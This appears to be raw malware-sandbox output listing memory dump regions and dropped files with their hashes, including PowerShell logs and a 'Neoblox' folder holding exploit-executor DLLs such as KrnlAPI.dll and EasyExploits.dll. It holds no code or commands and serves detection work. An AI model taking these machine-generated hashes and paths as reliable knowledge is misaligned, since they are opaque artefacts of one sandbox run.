SHA256 e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
SHA512 092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

memory/4384-101-0x00007FF798B00000-0x00007FF79C3B3000-memory.dmp

memory/4692-102-0x000001B5C89A0000-0x000001B5C89C2000-memory.dmp

memory/3024-117-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3024-119-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3024-116-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3024-120-0x00007FF93A7E0000-0x00007FF93A9E9000-memory.dmp

memory/3024-121-0x00007FF93A130000-0x00007FF93A1ED000-memory.dmp

memory/3024-122-0x0000000140000000-0x000000014002B000-memory.dmp

memory/552-136-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1004-139-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/732-143-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/732-142-0x000001CB19150000-0x000001CB1917B000-memory.dmp

memory/1212-162-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1288-168-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1288-167-0x000001CB76CF0000-0x000001CB76D1B000-memory.dmp

memory/1256-165-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1256-164-0x000001C5D5D00000-0x000001C5D5D2B000-memory.dmp

memory/1212-161-0x0000027991F60000-0x0000027991F8B000-memory.dmp

memory/1100-159-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1100-158-0x000002384A2E0000-0x000002384A30B000-memory.dmp

memory/1088-156-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1088-155-0x0000022A7B3B0000-0x0000022A7B3DB000-memory.dmp

memory/760-153-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/760-152-0x00000138CEBD0000-0x00000138CEBFB000-memory.dmp

memory/1004-138-0x0000020957D70000-0x0000020957D9B000-memory.dmp

memory/552-135-0x000002814D000000-0x000002814D02B000-memory.dmp

memory/648-133-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/648-132-0x0000023C3D8A0000-0x0000023C3D8CB000-memory.dmp

memory/704-128-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/704-127-0x000001D9F22F0000-0x000001D9F231B000-memory.dmp

memory/648-125-0x0000023C3D870000-0x0000023C3D894000-memory.dmp

memory/3024-115-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3024-114-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3248-396-0x000001EA6F170000-0x000001EA6F18C000-memory.dmp

memory/3248-397-0x000001EA6F190000-0x000001EA6F243000-memory.dmp

memory/3248-398-0x000001EA6F350000-0x000001EA6F35A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

memory/3248-404-0x000001EA6F380000-0x000001EA6F39C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6344564097353c8e7e68991fffa80d88
SHA1 2ac4d108a30ec3fbd2938b0563eb912415ea7c62
SHA256 d0af6d69f8bc0c98e9fb61dead6327bbc8b4f5292529313515382d8f883de0da
SHA512 e2b37a9001a91cb05483d72f88bd70a61ca5655939c2290fd1580710eec9d8d26a5fedbcb5223f5413b5dcc46f1d8b6b408e57be0e4ad4b37b55cbce9023a303

memory/3248-418-0x000001EA6F360000-0x000001EA6F36A000-memory.dmp

memory/3248-431-0x000001EA6F3C0000-0x000001EA6F3DA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 050567a067ffea4eb40fe2eefebdc1ee
SHA1 6e1fb2c7a7976e0724c532449e97722787a00fec
SHA256 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e
SHA512 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

memory/3248-444-0x000001EA6F370000-0x000001EA6F378000-memory.dmp

memory/3248-445-0x000001EA6F3A0000-0x000001EA6F3A6000-memory.dmp

memory/3248-446-0x000001EA6F3B0000-0x000001EA6F3BA000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 dbbd2d4458d7e8094846420da595dfc3
SHA1 267cb47b904f14a519d2bd73abfdb30e1a06e1a6
SHA256 e27390d57580e3dfba07bec3d8e430203bbc91e90f6937079b3fd52abc721bd4
SHA512 480e7ca865b811f79f35fcfe7a9ac0280b48d1f9459873d18f000db55c72d53345cf3a10075c1ac407439545f699ce2a7bef38b00b4e19439edf384b00045531

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f2dd68ab8e611f0143c6ad176f223ae9
SHA1 30f580175773f251a9572fe757de6eaef6844abc
SHA256 f935809085e90f8fc2c003afb46e81de28f3312ec097cf46f2bdc2488cb893e7
SHA512 f664b850c2fc6773e48171be5c180d8bc5c3a27945f5e6604605006a3c93e0bf3a516b647d6411a4d6b75bdf0a5e15b4f3621bf5702bbc3c46f9b517cb69dd04

memory/4888-806-0x000002506AB30000-0x000002506ABE3000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0168a3e09b930ae642b50398688e1d87
SHA1 9c7751cf13ecfc704d50c583244cba6e27d226f4
SHA256 f7cd31dcba7eaa70df174c083a18b13c173d64d52a07792a8f2be8d9518c65d0
SHA512 3cb1621320e932594e3f1bf3d6ce388cee51f8610e3e1c0cfef6191591f1c7a48cbec4c8fc5bf67822c0d8abf0977f0378e2dfa6929c9b6376ad0424de9751ed

memory/3000-966-0x0000000005730000-0x0000000005742000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Neoblox\DiscordRPC.xml

MD5 07dceb643b73dd3b700dcf82e1d6663a
SHA1 2d63c2b605485682d999935106ed6d2dbf674d3e
SHA256 24fc42b9582988ed65e5f003aa8e44358691a58f5db6a0e8821560c0fe9b2ee4
SHA512 cc4bc7113301c0dfca2660c00318a0a6603e85d5963440af764c9e0b37fadbcc9c249235ce3efd2a8090c9bb2c56509c097c0c833d4346fae68c72843feae112

C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe.Config

MD5 c7a4606f8f222fc96e1e6b08c093794b
SHA1 2700b3727ab01d93e75e1e12f308dcaeb1d37dba
SHA256 32d656a69b19be98ae050512a4d0f49ebe21b6f7bb9c50130b7e952ea4f5239b
SHA512 7516375b47536a51ede8079d25760e0142ac93077326b6cc033fd6cb1676b65aec7edb3f702922506f2b6b18992cd219be01e7adbf70c6d13404adceb410472b

C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe

MD5 60bdad498581b4998ad0397465d30891
SHA1 a57494c1f958dce86707187d8dfe17ae5c6028b7
SHA256 27ea6419a7bedd7b748b67f7b436d7beff65dcc149ac942b9d840f096fae7355
SHA512 c48bdb6b0cd6c66512f7204ef44b54f6a2a3d57b2586f95cab88288a6da620b060bff8ede38dd9352422ad6b926a2f0ceca76da1bc3df2de3c0867797e665396

C:\Users\Admin\AppData\Local\Temp\Neoblox\Siticone.UI.dll

MD5 fa842ffa299c794e57597aae857d9cb3
SHA1 154afdfd9bd80c1b512f516a8c187c6dd849161e
SHA256 b1d4cdc7891d51636c5e82a91b9bf20e6bb6e68ddf515ac6f51fbda7b199d07d
SHA512 04ee2bff2a9ff0cf89150bb73f0f6a0bda372a245f12c5772b7167821f54f3d1d43292e3ce3c9f2eca2202688c179d5f09248c0fe522bf028c221e07b2d34e4a

memory/4292-1108-0x00000000005D0000-0x00000000006CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Neoblox\WeAreDevs_API.dll

MD5 f263efb1b579cc33a0f1024c2a18d03b
SHA1 e9dc916b6d4606ba47e30787387dcfd490bafc56
SHA256 f2732f9e3a87d874a3108f8ff0be200bcab9d07fe77b02aaacd94da1efcb3963
SHA512 09a3d948b52b16136f2ce9ecdb094a99092a4a9cf6f324e67a0a5d04d244cf4c3fd2696010f1884272240c3bc24fdaf1edc9ac102bc438564e7fc0be7b2fca34

C:\Users\Admin\AppData\Local\Temp\Neoblox\KrnlAPI.dll

MD5 457242aba102f82daedb7ec907b1ac5c
SHA1 bb20ca697349a16fc80c928aea8d155c1cb4fa40
SHA256 3667300295731be993d6a2d6a21e23e8be9fb177a8b3325f55db28fd265fc19a
SHA512 23f8bd7cad2e8530dae8f14e620343658cf07ecfae71d223666166228e2d223abc5e981c26eb78ed4c4737c74284737a854c8e7e7cf06441244cbcfc9c6acd1b

memory/4292-1124-0x0000000005180000-0x0000000005188000-memory.dmp

memory/4292-1118-0x0000000005E00000-0x0000000005F3E000-memory.dmp

memory/4292-1130-0x0000000006010000-0x00000000060D8000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.9b3603b3-ba4f-4813-b472-d2fc03dbbd53.tmp.txt

MD5 0cc7ed9d5965b1a23319fdba6202f958
SHA1 b9a88d8aa9a49d52626b1cb5968a9ef45abfd3d9
SHA256 456296f92450fcd9a282ff5dc05b4c31ca3e48c056147deef977293b0a94ebda
SHA512 1971e831480d86781aad82edc2bfe037224aabbe579a5dc84de116a1f7b5a4e5b8fb3a0f0b8bf8718ce1d56d9c95871261129df1691e4a8664e7f21986267552

memory/4292-1127-0x00000000057C0000-0x00000000057CA000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.50d086e2-4870-44b8-8037-cc721cad6d11.tmp.csv

MD5 c4c1702b3b1c321b270e1998e26aef49
SHA1 bb8107f3a58e4630786d7f2a18539b3b565c1257
SHA256 d30a71db027754a1862d7be8b3bf132a4caf37fc9eb8f266a0e07c7114d0302c
SHA512 851d2e5323cadcb34e05c8d4a963f955d49fb74cf04743f214bf31935e25bf6831776e7d25ad6efe4d550835a3d4936c5e3000bdb642e139c51d65d094b9fd97

memory/4292-1114-0x00000000052A0000-0x000000000533E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Neoblox\EasyExploits.dll

MD5 1c5ffe214040f00ec898bd3c5110e8b2
SHA1 4abfbf2bcbcb742b4c4bbb11d21cafeeb93cf8bb
SHA256 23312041ffa8628a7f89a21ba72af853cb90f26cf134d456656276930b26c1ec
SHA512 682e5c06b1d26bee3f8d5cab9ff9c70908906c20b28ad7e022c37ce3b62b9af5cb1bf39734f387353566b45f5cf9f7c879c3d0a32c894168e6fe64ce7b80bd36

memory/4292-1110-0x0000000005190000-0x0000000005222000-memory.dmp

memory/4292-1109-0x0000000005850000-0x0000000005DF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Neoblox\Monaco\Monaco.html

MD5 08b6930cde9eb303d1dd59b311587072
SHA1 9f8b237181c918f7c3b660b0b57d915253243307
SHA256 eaab49b697c5993346036e9a2ff404587d76d7bc548e6cee65fc7b23688e9672
SHA512 178ceeb9c0babf5208d86c339ffa6da7521afa28244505b0fada8a649672c0bba256fb1833ef353f187fa5bc0b8ff2c389bc4a8811eac16330c98d583f375337

C:\Users\Admin\AppData\Local\Temp\Neoblox\Monaco\vs\loader.js

MD5 8a3086f6c6298f986bda09080dd003b1
SHA1 8c7d41c586bfa015fb5cc50a2fdc547711b57c3c
SHA256 0512d9ed3e5bb3daef94aa5c16a6c3e2ee26ffed9de00d1434ffe46a027b16b9
SHA512 9e586742f4e19938132e41145deec584a7b8c7e111b3c6e9254f8d11db632ebe4d66898458ed7bcfc0614d06e20eb33d5a6a8eb8b32d91110557255cf1dbf017

C:\Users\Admin\AppData\Local\Temp\Neoblox\Monaco\vs\editor\editor.main.js

MD5 9399a8eaa741d04b0ae6566a5ebb8106
SHA1 5646a9d35b773d784ad914417ed861c5cba45e31
SHA256 93d28520c07fbca09e20886087f28797bb7bd0e6cf77400153aab5ae67e3ce18
SHA512 d37ef5a848e371f7db9616a4bf8b5347449abb3e244a5527396756791583cad455802450ceeb88dce39642c47aceaf2be6b95bede23b9ed68b5d4b7b9022b9c8

C:\Users\Admin\AppData\Local\Temp\Neoblox\Monaco\vs\editor\editor.main.css

MD5 233217455a3ef3604bf4942024b94f98
SHA1 95cd3ce46f4ca65708ec25d59dddbfa3fc44e143
SHA256 2ec118616a1370e7c37342da85834ca1819400c28f83abfcbbb1ef50b51f7701
SHA512 6f4cb7b88673666b7dc1beab3ec2aec4d7d353e6da9f6f14ed2fee8848c7da34ee5060d9eb34ecbb5db71b5b98e3f8582c09ef3efe4f2d9d3135dea87d497455

C:\Users\Admin\AppData\Local\Temp\Neoblox\Monaco\vs\editor\editor.main.nls.js

MD5 74dd2381ddbb5af80ce28aefed3068fc
SHA1 0996dc91842ab20387e08a46f3807a3f77958902
SHA256 fdd9d64ce5284373d1541528d15e2aa8aa3a4adc11b51b3d71d3a3953f8bcc48
SHA512 8841e0823905cf3168f388a7aeaf5edd32d44902035ba2078202193354caf8cd74cb4cab920e455404575739f35e19ea5f3d88eab012c4ebefc0ccb1ed19a46e